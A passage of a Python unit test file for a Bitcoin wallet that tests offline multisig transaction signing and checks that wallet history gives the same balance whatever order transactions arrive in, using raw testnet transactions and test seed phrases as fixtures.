self.assertEqual('010000000001013eee274625ae78394847614a8bf513558bb6bd514dfd16855cb856e1e96d355401000000232200206ee8d4bb1277b7dbe1d4e49b880993aa993f417a9101cb23865c7c7258732704fdffffff02a02526000000000017a914a4189ef02c95cfe36f8e880c6cb54dff0837b22687585d72000000000017a91400698bd11c38f887f17c99846d9be96321fbf98987040047304402205a9dd9eb5676196893fb08f60079a2e9f567ee39614075d8c5d9fab0f11cbbc7022039640855188ebb7bccd9e3f00b397a888766d42d00d006f1ca7457c15449285f014730440220234f6648c5741eb195f0f4cd645298a10ce02f6ef557d05df93331e21c4f58cb022058ce2af0de1c238c4a8dd3b3c7a9a0da6e381ddad7593cddfc0480f9fe5baadf0147522102975c00f6af579f9a1d283f1e5a43032deadbab2308aef30fb307c0cfe54777462102d3f47041b424a84898e315cc8ef58190f6aec79c178c12de0790890ba7166e9c52aec0391400',
str(tx))
self.assertEqual('6a58a51591142429203b62b6ddf6b799a6926882efac229998c51bee6c3573eb', tx.txid())
self.assertEqual('96d0bca1001778c54e4c3a07929fab5562c5b5a23fd1ca3aa3870cc5df2bf97d', tx.wtxid())
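
# multisig, native segwit p2wsh variant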
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_sending_offline_hd_multisig_online_addr_p2wsh(self, mock_write):
# 2-of-3 p2wsh multisig
wallet_offline1 = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('bitter grass shiver impose acquire brush forget axis eager alone wine silver', '', True),
keystore.from_xpub('Vpub5fcdcgEwTJmbmqAktuK8Kyq92fMf7sWkcP6oqAii2tG47dNbfkGEGUbfS9NuZaRywLkHE6EmUksrqo32ZL3ouLN1HTar6oRiHpDzKMAF1tf'),
keystore.from_xpub('Vpub5fjkKyYnvSS4wBuakWTkNvZDaBM2vQ1MeXWq368VJHNr2eT8efqhpmZ6UUkb7s2dwCXv2Vuggjdhk4vZVyiAQTwUftvff73XcUGq2NQmWra')
],
'2of3', gap_limit=2
)
wallet_offline2 = WalletIntegrityHelper.create_multisig_wallet(
[
keystore.from_seed('snow nest raise royal more walk demise rotate smooth spirit canyon gun', '', True),
keystore.from_xpub('Vpub5fjkKyYnvSS4wBuakWTkNvZDaBM2vQ1MeXWq368VJHNr2eT8efqhpmZ6UUkb7s2dwCXv2Vuggjdhk4vZVyiAQTwUftvff73XcUGq2NQmWra'),
keystore.from_xpub('Vpub5gSKXzxK7FeKQedu2q1z9oJWxqvX72AArW3HSWpEhc8othDH8xMDu28gr7gf17sp492BuJod8Tn7anjvJrKpETwqnQqX7CS8fcYyUtedEMk')
],
'2of3', gap_limit=2
)
# ^ third seed: hedgehog sunset update estate number jungle amount piano friend donate upper wool
wallet_online = WalletIntegrityHelper.create_imported_wallet(privkeys=False)
wallet_online.import_address('tb1q83p6eqxkuvq4eumcha46crpzg4nj84s9p0hnynkxg8nhvfzqcc7q4erju6')
# bootstrap wallet_online
funding_tx = Transaction('0100000000010132352f6459e847e65e56aa05cbd7b9ee67be90b40d8f92f6f11e9bfaa11399c501000000171600142e5d579693b2a7679622935df94d9f3c84909b24fdffffff0280969800000000002200203c43ac80d6e3015cf378bf6bac0c22456723d6050bef324ec641e7762440c63c83717d010000000017a91441b772909ad301b41b76f4a3c5058888a7fe6f9a8702483045022100de54689f74b8efcce7fdc91e40761084686003bcd56c886ee97e75a7e803526102204dea51ae5e7d01bd56a8c336c64841f7fe02a8b101fa892e13f2d079bb14e6bf012102024e2f73d632c49f4b821ccd3b6da66b155427b1e5b1c4688cefd5a4b4bfa404c1391400')
funding_txid = funding_tx.txid()
self.assertEqual('643a7ab9083d0227dd9df314ce56b18d279e6018ff975079dfaab82cd7a66fa3', funding_txid)
wallet_online.receive_tx_callback(funding_txid, funding_tx, TX_HEIGHT_UNCONFIRMED)
# create unsigned tx
outputs = [TxOutput(bitcoin.TYPE_ADDRESS, '2MyoZVy8T1t94yLmyKu8DP1SmbWvnxbkwRA', 2500000)]
tx = wallet_online.mktx(outputs=outputs, password=None, config=self.config, fee=5000)
tx.set_rbf(True)
tx.locktime = 1325505
self.assertFalse(tx.is_complete())
self.assertEqual(1, len(tx.inputs()))
tx_copy = Transaction(tx.serialize())
self.assertTrue(wallet_online.is_mine(wallet_online.get_txin_address(tx_copy.inputs()[0])))
self.assertEqual(tx.txid(), tx_copy.txid())
# sign tx - first
tx = wallet_offline1.sign_transaction(tx_copy, password=None)
self.assertFalse(tx.is_complete())
self.assertEqual('32e946761b4e718c1fa8d044db9e72d5831f6395eb284faf2fb5c4af0743e501', tx.txid())
tx = Transaction(tx.serialize())
# sign tx - second
tx = wallet_offline2.sign_transaction(tx, password=None)
self.assertTrue(tx.is_complete())
tx = Transaction(tx.serialize())
self.assertEqual('01000000000101a36fa6d72cb8aadf795097ff18609e278db156ce14f39ddd27023d08b97a3a640000000000fdffffff02a02526000000000017a91447ee5a659f6ffb53f7e3afc1681b6415f3c00fa187585d7200000000002200203c43ac80d6e3015cf378bf6bac0c22456723d6050bef324ec641e7762440c63c04004730440220629d89626585f563202e6b38ceddc26ccd00737e0b7ee4239b9266ef9174ea2f02200b74828399a2e35ed46c9b484af4817438d5fea890606ebb201b821944db1fdc0147304402205d1a59c84c419992069e9764a7992abca6a812cc5dfd4f0d6515d4283e660ce802202597a38899f31545aaf305629bd488f36bf54e4a05fe983932cafbb3906efb8f016952210223f815ab09f6bfc8519165c5232947ae89d9d43d678fb3486f3b28382a2371fa210273c529c2c9a99592f2066cebc2172a48991af2b471cb726b9df78c6497ce984e2102aa8fc578b445a1e4257be6b978fcece92980def98dce0e1eb89e7364635ae94153aec1391400',
str(tx))
self.assertEqual('32e946761b4e718c1fa8d044db9e72d5831f6395eb284faf2fb5c4af0743e501', tx.txid())
self.assertEqual('4376fa5f1f6cb37b1f3956175d3bd4ef6882169294802b250a3c672f3ff431c1', tx.wtxid())
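

# restores an old-seed wallet and replays the same set of transactions in several
# random orders; the final balance must not depend on the order of arrival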
class TestWalletHistory_SimpleRandomOrder(TestCaseForTestnet):
transactions = {
"0f4972c84974b908a58dda2614b68cf037e6c03e8291898c719766f213217b67": "01000000029d1bdbe67f0bd0d7bd700463f5c29302057c7b52d47de9e2ca5069761e139da2000000008b483045022100a146a2078a318c1266e42265a369a8eef8993750cb3faa8dd80754d8d541d5d202207a6ab8864986919fd1a7fd5854f1e18a8a0431df924d7a878ec3dc283e3d75340141045f7ba332df2a7b4f5d13f246e307c9174cfa9b8b05f3b83410a3c23ef8958d610be285963d67c7bc1feb082f168fa9877c25999963ff8b56b242a852b23e25edfeffffff9d1bdbe67f0bd0d7bd700463f5c29302057c7b52d47de9e2ca5069761e139da2010000008a47304402201c7fa37b74a915668b0244c01f14a9756bbbec1031fb69390bcba236148ab37e02206151581f9aa0e6758b503064c1e661a726d75c6be3364a5a121a8c12cf618f64014104dc28da82e141416aaf771eb78128d00a55fdcbd13622afcbb7a3b911e58baa6a99841bfb7b99bcb7e1d47904fda5d13fdf9675cdbbe73e44efcc08165f49bac6feffffff02b0183101000000001976a914ca14915184a2662b5d1505ce7142c8ca066c70e288ac005a6202000000001976a9145eb4eeaefcf9a709f8671444933243fbd05366a388ac54c51200",
"2791cdc98570cc2b6d9d5b197dc2d002221b074101e3becb19fab4b79150446d": "010000000132201ff125888a326635a2fc6e971cd774c4d0c1a757d742d0f6b5b020f7203a050000006a47304402201d20bb5629a35b84ff9dd54788b98e265623022894f12152ac0e6158042550fe02204e98969e1f7043261912dd0660d3da64e15acf5435577fc02a00eccfe76b323f012103a336ad86546ab66b6184238fe63bb2955314be118b32fa45dd6bd9c4c5875167fdffffff0254959800000000001976a9148d2db0eb25b691829a47503006370070bc67400588ac80969800000000001976a914f96669095e6df76cfdf5c7e49a1909f002e123d088ace8ca1200",
"2d216451b20b6501e927d85244bcc1c7c70598332717df91bb571359c358affd": "010000000001036cdf8d2226c57d7cc8485636d8e823c14790d5f24e6cf38ba9323babc7f6db2901000000171600143fc0dbdc2f939c322aed5a9c3544468ec17f5c3efdffffff507dce91b2a8731636e058ccf252f02b5599489b624e003435a29b9862ccc38c0200000017160014c50ff91aa2a790b99aa98af039ae1b156e053375fdffffff6254162cf8ace3ddfb3ec242b8eade155fa91412c5bde7f55decfac5793743c1010000008b483045022100de9599dcd7764ca8d4fcbe39230602e130db296c310d4abb7f7ae4d139c4d46402200fbfd8e6dc94d90afa05b0c0eab3b84feb465754db3f984fbf059447282771c30141045eecefd39fabba7b0098c3d9e85794e652bdbf094f3f85a3de97a249b98b9948857ea1e8209ee4f196a6bbcfbad103a38698ee58766321ba1cdee0cbfb60e7b2fdffffff01e85af70100000000160014e8d29f07cd5f813317bec4defbef337942d85d74024730440220218049aee7bbd34a7fa17f972a8d24a0469b0131d943ef3e30860401eaa2247402203495973f006e6ee6ae74a83228623029f238f37390ee4b587d95cdb1d1aaee9901210392ba263f3a2b260826943ff0df25e9ca4ef603b98b0a916242c947ae0626575f02473044022002603e5ceabb4406d11aedc0cccbf654dd391ce68b6b2228a40e51cf8129310d0220533743120d93be8b6c1453973935b911b0a2322e74708d23e8b5f90e74b0f192012103221b4ee0f508ba595fc1b9c2252ed9d03e99c73b97344dae93263c68834f034800ed161300",
"31494e7e9f42f4bd736769b07cc602e2a1019617b2c72a03ec945b667aada78f": "0100000000010454022b1b4d3b45e7fcac468de2d6df890a9f41050c05d80e68d4b083f728e76a000000008b483045022100ea8fe74db2aba23ad36ac66aaa481bad2b4d1b3c331869c1d60a28ce8cfad43c02206fa817281b33fbf74a6dd7352bdc5aa1d6d7966118a4ad5b7e153f37205f1ae80141045f7ba332df2a7b4f5d13f246e307c9174cfa9b8b05f3b83410a3c23ef8958d610be285963d67c7bc1feb082f168fa9877c25999963ff8b56b242a852b23e25edfdffffff54022b1b4d3b45e7fcac468de2d6df890a9f41050c05d80e68d4b083f728e76a01000000171600146dfe07e12af3db7c715bf1c455f8517e19c361e7fdffffff54022b1b4d3b45e7fcac468de2d6df890a9f41050c05d80e68d4b083f728e76a020000006a47304402200b1fb89e9a772a8519294acd61a53a29473ce76077165447f49a686f1718db5902207466e2e8290f84114dc9d6c56419cb79a138f03d7af8756de02c810f19e4e03301210222bfebe09c2638cfa5aa8223fb422fe636ba9675c5e2f53c27a5d10514f49051fdffffff54022b1b4d3b45e7fcac468de2d6df890a9f41050c05d80e68d4b083f728e76a0300000000fdffffff018793140d000000001600144b3e27ddf4fc5f367421ee193da5332ef351b700000247304402207ba52959938a3853bcfd942d8a7e6a181349069cde3ea73dbde43fa9669b8d5302207a686b92073863203305cb5d5550d88bdab0d21b9e9761ba4a106ea3970e08d901210265c1e014112ed19c9f754143fb6a2ff89f8630d62b33eb5ae708c9ea576e61b50002473044022029e868a905aa3ecae6eafcbd5959aefff0e5f39c1fc7a131a174828806e74e5202202f0aaa7c3cb3d9a9d526e5428ce37c0f0af0d774aa30b09ded8bc2230e7ffaf2012102fe0104455dc52b1689bba130664e452642180eb865217acfc6997260b7d946ae22c71200",
"336eee749da7d1c537fd5679157fae63005bfd4bb8cf47ae73600999cbc9beaa": "0100000000010232201ff125888a326635a2fc6e971cd774c4d0c1a757d742d0f6b5b020f7203a020000006a4730440220198c0ba2b2aefa78d8cca01401d408ecdebea5ac05affce36f079f6e5c8405ca02200eabb1b9a01ff62180cf061dfacedba6b2e07355841b9308de2d37d83489c7b80121031c663e5534fe2a6de816aded6bb9afca09b9e540695c23301f772acb29c64a05fdfffffffb28ff16811d3027a2405be68154be8fdaff77284dbce7a2314c4107c2c941600000000000fdffffff015e104f01000000001976a9146dfd56a0b5d0c9450d590ad21598ecfeaa438bd788ac000247304402207d6dc521e3a4577685535f098e5bac4601aa03658b924f30bf7afef1850e437e022045b76771d8b6ca1939352d6b759fca31029e5b2edffa44dc747fe49770e746cd012102c7f36d4ceed353b90594ebaf3907972b6d73289bdf4707e120de31ec4e1eb11679f31200",
"3a6ed17d34c49dfdf413398e113cf5f71710d59e9f4050bbc601d513a77eb308": "010000000168091e76227e99b098ef8d6d5f7c1bb2a154dd49103b93d7b8d7408d49f07be0000000008a47304402202f683a63af571f405825066bd971945a35e7142a75c9a5255d364b25b7115d5602206c59a7214ae729a519757e45fdc87061d357813217848cf94df74125221267ac014104aecb9d427e10f0c370c32210fe75b6e72ccc4f415076cf1a6318fbed5537388862c914b29269751ab3a04962df06d96f5f4f54e393a0afcbfa44b590385ae61afdffffff0240420f00000000001976a9145f917fd451ca6448978ebb2734d2798274daf00b88aca8063d00000000001976a914e1232622a96a04f5e5a24ca0792bb9c28b089d6e88ace9ca1200",
"475c149be20c8a73596fad6cb8861a5af46d4fcf8e26a9dbf6cedff7ff80b70d": "01000000013a7e6f19a963adc7437d2f3eb0936f1fc9ef4ba7e083e19802eb1111525a59c2000000008b483045022100958d3931051306489d48fe69b32561e0a16e82a2447c07be9d1069317084b5e502202f70c2d9be8248276d334d07f08f934ffeea83977ad241f9c2de954a2d577f94014104d950039cec15ad10ad4fb658873bc746148bc861323959e0c84bf10f8633104aa90b64ce9f80916ab0a4238e025dcddf885b9a2dd6e901fe043a433731db8ab4fdffffff02a086010000000000160014bbfab2cc3267cea2df1b68c392cb3f0294978ca922940d00000000001976a914760f657c67273a06cad5b1d757a95f4ed79f5a4b88ac4c8d1300",
"56a65810186f82132cea35357819499468e4e376fca685c023700c75dc3bd216": "01000000000101614b142aeeb827d35d2b77a5b11f16655b6776110ddd9f34424ff49d85706cf90200000000fdffffff02784a4c00000000001600148464f47f35cbcda2e4e5968c5a3a862c43df65a1404b4c00000000001976a914c9efecf0ecba8b42dce0ae2b28e3ea0573d351c988ac0247304402207d8e559ed1f56cb2d02c4cb6c95b95c470f4b3cb3ce97696c3a58e39e55cd9b2022005c9c6f66a7154032a0bb2edc1af1f6c8f488bec52b6581a3a780312fb55681b0121024f83b87ac3440e9b30cec707b7e1461ecc411c2f45520b45a644655528b0a68ae9ca1200",
"6ae728f783b0d4680ed8050c05419f0a89dfd6e28d46acfce7453b4d1b2b0254": "0100000000010496941b9f18710b39bacde890e39a7fa401e6bf49985857cb7adfb8a45147ef1e000000001716001441aec99157d762708339d7faf7a63a8c479ed84cfdffffff96941b9f18710b39bacde890e39a7fa401e6bf49985857cb7adfb8a45147ef1e0100000000fdffffff1a5d1e4ca513983635b0df49fd4f515c66dd26d7bff045cfbd4773aa5d93197f000000006a4730440220652145460092ef42452437b942cb3f563bf15ad90d572d0b31d9f28449b7a8dd022052aae24f58b8f76bd2c9cf165cc98623f22870ccdbef1661b6dbe01c0ef9010f01210375b63dd8e93634bbf162d88b25d6110b5f5a9638f6fe080c85f8b21c2199a1fdfdffffff1a5d1e4ca513983635b0df49fd4f515c66dd26d7bff045cfbd4773aa5d93197f010000008a47304402207517c52b241e6638a84b05385e0b3df806478c2e444f671ca34921f6232ee2e70220624af63d357b83e3abe7cdf03d680705df0049ec02f02918ee371170e3b4a73d014104de408e142c00615294813233cdfe9e7774615ae25d18ba4a1e3b70420bb6666d711464518457f8b947034076038c6f0cfc8940d85d3de0386e0ad88614885c7cfdffffff0480969800000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac809698000000000017a914f2a76207d7b54bd34282281205923841341d9e1f87002d3101000000001976a914b8d4651937cd7db5bcf5fc98e6d2d8cfa131e85088ac743db20a00000000160014c7d0df09e03173170aed0247243874c6872748ed02483045022100b932cda0aeb029922e126568a48c05d79317747dcd77e61dce44e190e140822002202d13f84338bb272c531c4086277ac11e166c59612f4aefa6e20f78455bdc09970121028e6808a8ac1e9ede621aaabfcad6f86662dbe0ace0236f078eb23c24bc88bd5e02483045022100d74a253262e3898626c12361ba9bb5866f9303b42eec0a55ced0578829e2e61e022059c08e61d90cd63c84de61c796c9d1bc1e2f8217892a7c07b383af357ddd7a730121028641e89822127336fc12ff99b1089eb1a124847639a0e98d17ff03a135ad578b000020c71200",
"72419d187c61cfc67a011095566b374dc2c01f5397e36eafe68e40fc44474112": "0100000002677b2113f26697718c8991823ec0e637f08cb61426da8da508b97449c872490f000000008b4830450221009c50c0f56f34781dfa7b3d540ac724436c67ffdc2e5b2d5a395c9ebf72116ef802205a94a490ea14e4824f36f1658a384aeaecadd54839600141eb20375a49d476d1014104c291245c2ee3babb2a35c39389df56540867f93794215f743b9aa97f5ba114c4cdee8d49d877966728b76bc649bb349efd73adef1d77452a9aac26f8c51ae1ddfdffffff677b2113f26697718c8991823ec0e637f08cb61426da8da508b97449c872490f010000008b483045022100ae0b286493491732e7d3f91ab4ac4cebf8fe8a3397e979cb689e62d350fdcf2802206cf7adf8b29159dd797905351da23a5f6dab9b9dbf5028611e86ccef9ff9012e014104c62c4c4201d5c6597e5999f297427139003fdb82e97c2112e84452d1cfdef31f92dd95e00e4d31a6f5f9af0dadede7f6f4284b84144e912ff15531f36358bda7fdffffff019f7093030000000022002027ce908c4ee5f5b76b4722775f23e20c5474f459619b94040258290395b88afb6ec51200",
"76bcf540b27e75488d95913d0950624511900ae291a37247c22d996bb7cde0b4": "0100000001f4ba9948cdc4face8315c7f0819c76643e813093ffe9fbcf83d798523c7965db000000006a473044022061df431a168483d144d4cffe1c5e860c0a431c19fc56f313a899feb5296a677c02200208474cc1d11ad89b9bebec5ec00b1e0af0adaba0e8b7f28eed4aaf8d409afb0121039742bf6ab70f12f6353e9455da6ed88f028257950450139209b6030e89927997fdffffff01d4f84b00000000001976a9140b93db89b6bf67b5c2db3370b73d806f458b3d0488ac0a171300",
"7f19935daa7347bdcf45f0bfd726dd665c514ffd49dfb035369813a54c1e5d1a": "01000000000102681b6a8dd3a406ee10e4e4aece3c2e69f6680c02f53157be6374c5c98322823a00000000232200209adfa712053a06cc944237148bcefbc48b16eb1dbdc43d1377809bcef1bea9affdffffff681b6a8dd3a406ee10e4e4aece3c2e69f6680c02f53157be6374c5c98322823a0100000023220020f40ed2e3fbffd150e5b74f162c3ce5dae0dfeba008a7f0f8271cf1cf58bfb442fdffffff02801d2c04000000001976a9140cc01e19090785d629cdcc98316f328df554de4f88ac6d455d05000000001976a914b9e828990a8731af4527bcb6d0cddf8d5ffe90ce88ac040047304402206eb65bd302eefae24eea05781e8317503e68584067d35af028a377f0751bb55b0220226453d00db341a4373f1bcac2391f886d3a6e4c30dd15133d1438018d2aad24014730440220343e578591fab0236d28fb361582002180d82cb1ba79eec9139a7a9519fca4260220723784bd708b4a8ed17bb4b83a5fd2e667895078e80eec55119015beb3592fd2016952210222eca5665ed166d090a5241d9a1eb27a92f85f125aaf8df510b2b5f701f3f534210227bca514c22353a7ae15c61506522872afecf10df75e599aabe4d562d0834fce2103601d7d49bada5a57a4832eafe4d1f1096d7b0b051de4a29cd5fc8ad62865e0a553ae0400483045022100b15ea9daacd809eb4d783a1449b7eb33e2965d4229e1a698db10869299dddc670220128871ffd27037a3e9dac6748ce30c14b145dd7f9d56cc9dcde482461fb6882601483045022100cb659e1de65f8b87f64d1b9e62929a5d565bbd13f73a1e6e9dd5f4efa024b6560220667b13ce2e1a3af2afdcedbe83e2120a6e8341198a79efb855b8bc5f93b4729f0169522102d038600af253cf5019f9d5637ca86763eca6827ed7b2b7f8cc6326dffab5eb68210315cdb32b7267e9b366fb93efe29d29705da3db966e8c8feae0c8eb51a7cf48e82103f0335f730b9414acddad5b3ee405da53961796efd8c003e76e5cd306fcc8600c53ae1fc71200",
"9de08bcafc602a3d2270c46cbad1be0ef2e96930bec3944739089f960652e7cb": "010000000001013409c10fd732d9e4b3a9a1c4beb511fa5eb32bc51fd169102a21aa8519618f800000000000fdffffff0640420f00000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac40420f00000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac40420f00000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac80841e00000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac64064a000000000016001469825d422ca80f2a5438add92d741c7df45211f280969800000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac02483045022100b4369b18bccb74d72b6a38bd6db59122a9e8af3356890a5ecd84bdb8c7ffe317022076a5aa2b817be7b3637d179106fccebb91acbc34011343c8e8177acc2da4882e0121033c8112bbf60855f4c3ae489954500c4b8f3408665d8e1f63cf3216a76125c69865281300",
"a29d131e766950cae2e97dd4527b7c050293c2f5630470bdd7d00b7fe6db1b9d": "010000000400899af3606e93106a5d0f470e4e2e480dfc2fd56a7257a1f0f4d16fd5961a0f000000006a47304402205b32a834956da303f6d124e1626c7c48a30b8624e33f87a2ae04503c87946691022068aa7f936591fb4b3272046634cf526e4f8a018771c38aff2432a021eea243b70121034bb61618c932b948b9593d1b506092286d9eb70ea7814becef06c3dfcc277d67fdffffff4bc2dcc375abfc7f97d8e8c482f4c7b8bc275384f5271678a32c35d955170753000000006b483045022100de775a580c6cb47061d5a00c6739033f468420c5719f9851f32c6992610abd3902204e6b296e812bb84a60c18c966f6166718922780e6344f243917d7840398eb3db0121025d7317c6910ad2ad3d29a748c7796ddf01e4a8bc5e3bf2a98032f0a20223e4aafdffffff4bc2dcc375abfc7f97d8e8c482f4c7b8bc275384f5271678a32c35d955170753010000006a4730440220615a26f38bf6eb7043794c08fb81f273896b25783346332bec4de8dfaf7ed4d202201c2bc4515fc9b07ded5479d5be452c61ce785099f5e33715e9abd4dbec410e11012103caa46fcb1a6f2505bf66c17901320cc2378057c99e35f0630c41693e97ebb7cffdffffff4bc2dcc375abfc7f97d8e8c482f4c7b8bc275384f5271678a32c35d955170753030000006b483045022100c8fba762dc50041ee3d5c7259c01763ed913063019eefec66678fb8603624faa02200727783ccbdbda8537a6201c63e30c0b2eb9afd0e26cb568d885e6151ef2a8540121027254a862a288cfd98853161f575c49ec0b38f79c3ef0bf1fb89986a3c36a8906fdffffff0240787d01000000001976a9149cd3dfb0d87a861770ae4e268e74b45335cf00ab88ac3bfc1502000000001976a914c30f2af6a79296b6531bf34dba14c8419be8fb7d88ac52c51200",
"c1433779c5faec5df5e7bdc51214a95f15deeab842c23efbdde3acf82c165462": "0100000003aabec9cb99096073ae47cfb84bfd5b0063ae7f157956fd37c5d1a79d74ee6e33000000008b4830450221008136fc880d5e24fdd9d2a43f5085f374fef013b814f625d44a8075104981d92a0220744526ec8fc7887c586968f22403f0180d54c9b7ff8db9b553a3c4497982e8250141047b8b4c91c5a93a1f2f171c619ca41770427aa07d6de5130c3ba23204b05510b3bd58b7a1b35b9c4409104cfe05e1677fc8b51c03eac98b206e5d6851b31d2368fdffffff16d23bdc750c7023c085a6fc76e3e468944919783535ea2c13826f181058a656010000008a47304402204148410f2d796b1bb976b83904167d28b65dcd7c21b3876022b4fa70abc86280022039ea474245c3dc8cd7e5a572a155df7a6a54496e50c73d9fed28e76a1cf998c00141044702781daed201e35aa07e74d7bda7069e487757a71e3334dc238144ad78819de4120d262e8488068e16c13eea6092e3ab2f729c13ef9a8c42136d6365820f7dfdffffff68091e76227e99b098ef8d6d5f7c1bb2a154dd49103b93d7b8d7408d49f07be0010000008b4830450221008228af51b61a4ee09f58b4a97f204a639c9c9d9787f79b2fc64ea54402c8547902201ed81fca828391d83df5fbd01a3fa5dd87168c455ed7451ba8ccb5bf06942c3b0141046fcdfab26ac08c827e68328dbbf417bbe7577a2baaa5acc29d3e33b3cc0c6366df34455a9f1754cb0952c48461f71ca296b379a574e33bcdbb5ed26bad31220bfdffffff0210791c00000000001976a914a4b991e7c72996c424fe0215f70be6aa7fcae22c88ac80c3c901000000001976a914b0f6e64ea993466f84050becc101062bb502b4e488ac7af31200",
"c2595a521111eb0298e183e0a74befc91f6f93b03e2f7d43c7ad63a9196f7e3a": "01000000018557003cb450f53922f63740f0f77db892ef27e15b2614b56309bfcee96a0ad3010000006a473044022041923c905ae4b5ed9a21aa94c60b7dbcb8176d58d1eb1506d9fb1e293b65ce01022015d6e9d2e696925c6ad46ce97cc23dec455defa6309b839abf979effc83b8b160121029332bf6bed07dcca4be8a5a9d60648526e205d60c75a21291bffcdefccafdac3fdffffff01c01c0f00000000001976a914a2185918aa1006f96ed47897b8fb620f28a1b09988ac01171300",
"e07bf0498d40d7b8d7933b1049dd54a1b21b7c5f6d8def98b0997e22761e0968": "01000000016d445091b7b4fa19cbbee30141071b2202d0c27d195b9d6d2bcc7085c9cd9127010000008b483045022100daf671b52393af79487667eddc92ebcc657e8ae743c387b25d1c1a2e19c7a4e7022015ef2a52ea7e94695de8898821f9da539815775516f18329896e5fc52a3563b30141041704a3daafaace77c8e6e54cf35ed27d0bf9bb8bcd54d1b955735ff63ec54fe82a80862d455c12e739108b345d585014bf6aa0cbd403817c89efa18b3c06d6b5fdffffff02144a4c00000000001976a9148942ac692ace81019176c4fb0ac408b18b49237f88ac404b4c00000000001976a914dd36d773acb68ac1041bc31b8a40ee504b164b2e88ace9ca1200",
"e453e7346693b507561691b5ea73f8eba60bfc8998056226df55b2fac88ba306": "010000000125af87b0c2ebb9539d644e97e6159ccb8e1aa80fe986d01f60d2f3f37f207ae8010000008b483045022100baed0747099f7b28a5624005d50adf1069120356ac68c471a56c511a5bf6972b022046fbf8ec6950a307c3c18ca32ad2955c559b0d9bbd9ec25b64f4806f78cadf770141041ea9afa5231dc4d65a2667789ebf6806829b6cf88bfe443228f95263730b7b70fb8b00b2b33777e168bcc7ad8e0afa5c7828842794ce3814c901e24193700f6cfdffffff02a0860100000000001976a914ade907333744c953140355ff60d341cedf7609fd88ac68830a00000000001976a9145d48feae4c97677e4ca7dcd73b0d9fd1399c962b88acc9cc1300",
"e87a207ff3f3d2601fd086e90fa81a8ecb9c15e6974e649d53b9ebc2b087af25": "01000000010db780fff7dfcef6dba9268ecf4f6df45a1a86b86cad6f59738a0ce29b145c47010000008a47304402202887ec6ec200e4e2b4178112633011cbdbc999e66d398b1ff3998e23f7c5541802204964bd07c0f18c48b7b9c00fbe34c7bc035efc479e21a4fa196027743f06095f0141044f1714ed25332bb2f74be169784577d0838aa66f2374f5d8cbbf216063626822d536411d13cbfcef1ff3cc1d58499578bc4a3c4a0be2e5184b2dd7963ef67713fdffffff02a0860100000000001600145bbdf3ba178f517d4812d286a40c436a9088076e6a0b0c00000000001976a9143fc16bef782f6856ff6638b1b99e4d3f863581d388acfbcb1300"
}
txid_list = sorted(list(transactions))
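    # sorted so the integer indices used by the txorder tests below map to
    # txids deterministically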
@classmethod
def create_old_wallet(cls):
ks = keystore.from_old_mpk('e9d4b7866dd1e91c862aebf62a49548c7dbf7bcc6e4b7b8c9da820c7737968df9c09d5a3e271dc814a29981f81b3faaf2737b551ef5dcc6189cf0f8252c442b3')
# seed words: powerful random nobody notice nothing important anyway look away hidden message over
w = WalletIntegrityHelper.create_standard_wallet(ks, gap_limit=20)
# some txns are beyond gap limit:
w.create_new_address(for_change=True)
return w
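    # The three txorder tests below replay the exact same transaction set,
    # permuting only the order in which the txns are received; each asserts
    # the same final balance, i.e. history reconstruction must not depend
    # on receive order.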
@mock.patch.object(storage.WalletStorage, '_write')
def test_restoring_old_wallet_txorder1(self, mock_write):
w = self.create_old_wallet()
for i in [2, 12, 7, 9, 11, 10, 16, 6, 17, 1, 13, 15, 5, 8, 4, 0, 14, 18, 3]:
tx = Transaction(self.transactions[self.txid_list[i]])
w.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual(27633300, sum(w.get_balance()))
@mock.patch.object(storage.WalletStorage, '_write')
def test_restoring_old_wallet_txorder2(self, mock_write):
w = self.create_old_wallet()
for i in [9, 18, 2, 0, 13, 3, 1, 11, 4, 17, 7, 14, 12, 15, 10, 8, 5, 6, 16]:
tx = Transaction(self.transactions[self.txid_list[i]])
w.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual(27633300, sum(w.get_balance()))
@mock.patch.object(storage.WalletStorage, '_write')
def test_restoring_old_wallet_txorder3(self, mock_write):
w = self.create_old_wallet()
for i in [5, 8, 17, 0, 9, 10, 12, 3, 15, 18, 2, 11, 14, 7, 16, 1, 4, 6, 13]:
tx = Transaction(self.transactions[self.txid_list[i]])
w.receive_tx_callback(tx.txid(), tx, TX_HEIGHT_UNCONFIRMED)
self.assertEqual(27633300, sum(w.get_balance()))
class TestWalletHistory_EvilGapLimit(TestCaseForTestnet):
transactions = {
# txn A:
"511a35e240f4c8855de4c548dad932d03611a37e94e9203fdb6fc79911fe1dd4": "010000000001018aacc3c8f98964232ebb74e379d8ff4e800991eecfcf64bd1793954f5e50a8790100000000fdffffff0340420f0000000000160014dbf321e905d544b54b86a2f3ed95b0ac66a3ddb0ff0514000000000016001474f1c130d3db22894efb3b7612b2c924628d0d7e80841e000000000016001488492707677190c073b6555fb08d37e91bbb75d802483045022100cf2904e09ea9d2670367eccc184d92fcb8a9b9c79a12e4efe81df161077945db02203530276a3401d944cf7a292e0660f36ee1df4a1c92c131d2c0d31d267d52524901210215f523a412a5262612e1a5ef9842dc864b0d73dc61fb4c6bfd480a867bebb1632e181400",
# txn B:
"fde0b68938709c4979827caa576e9455ded148537fdb798fd05680da64dc1b4f": "01000000000101a317998ac6cc717de17213804e1459900fe257b9f4a3b9b9edd29806728277530100000000fdffffff03c0c62d00000000001600149543301687b1ca2c67718d55fbe10413c73ddec200093d00000000001600141bc12094a4475dcfbf24f9920dafddf9104ca95b3e4a4c0000000000160014b226a59f2609aa7da4026fe2c231b5ae7be12ac302483045022100f1082386d2ce81612a3957e2801803938f6c0066d76cfbd853918d4119f396df022077d05a2b482b89707a8a600013cb08448cf211218a462f2a23c2c0d80a8a0ca7012103f4aac7e189de53d95e0cb2e45d3c0b2be18e93420734934c61a6a5ad88dd541033181400",
# txn C:
